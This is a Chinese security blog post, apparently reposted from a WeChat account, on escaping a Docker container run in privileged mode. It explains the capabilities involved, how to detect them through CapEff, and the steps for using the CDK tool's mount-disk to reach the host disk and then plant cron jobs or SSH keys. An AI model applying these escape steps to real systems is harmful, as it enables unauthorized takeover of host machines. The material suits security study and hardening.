Docker Privileged特权逃逸

admin 2023年4月8日18:23:54评论67 views字数 768阅读2分33秒阅读模式

文章前言

在Docker中Privileged是一种特殊的权限模式,它允许Docker容器在启动时获取到与宿主机相同的权限级别。具体来说,Privileged权限可以让容器拥有以下能力:

1、访问宿主机的所有设备文件
2、在容器内部运行与宿主机上相同的内核模块
3、能够修改容器内部的网络配置
4、可以使用mount命令挂载宿主机上任意文件系统

需要注意的是使用Privileged权限可以给容器带来更高的权限,但同时也会带来安全风险。因此,在使用Privileged权限时应该非常谨慎,并且只应该在特定场景下使用,例如需要进行底层系统调试或者测试等需要访问宿主机资源的场景。

漏洞概述

操作者使用特权模式启动的容器时,Docker管理员可以通过mount命令将外部宿主机磁盘设备挂载进容器内部,获取对整个宿主机的文件读写权限,此外还可以通过写入计划任务等方式在宿主机执行命令

环境搭建

docker run -v /home/ubuntu/cdk:/cdk --rm -it --privileged ubuntu bash

Docker Privileged特权逃逸

特权检测

在容器中时可以通过如下参数检测当前容器是否是以特权模式启动:

cat /proc/self/status | grep CapEff

如果是以特权模式启动的话,CapEff对应的掩码值为0000003fffffffff

Docker Privileged特权逃逸


通过capsh命令可以解码出具体的Capabilitie

Docker Privileged特权逃逸

漏洞利用

Step 1:容器内部执行以下命令

./cdk run mount-disk

Docker Privileged特权逃逸

Step 2:在容器内部进入挂载目录,直接管理宿主机磁盘文件

cd /tmp/cdk_dyyopls -al

Docker Privileged特权逃逸

Step  3:之后写入计划任务或者通过写入SSH公钥并进行远程连接获取主机权限即可(ubuntu中计划任务总是有问题很迷)

原文始发于微信公众号(七芒星实验室):Docker Privileged特权逃逸

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年4月8日18:23:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Docker Privileged特权逃逸https://cn-sec.com/archives/1661059.html

发表评论

匿名网友 填写信息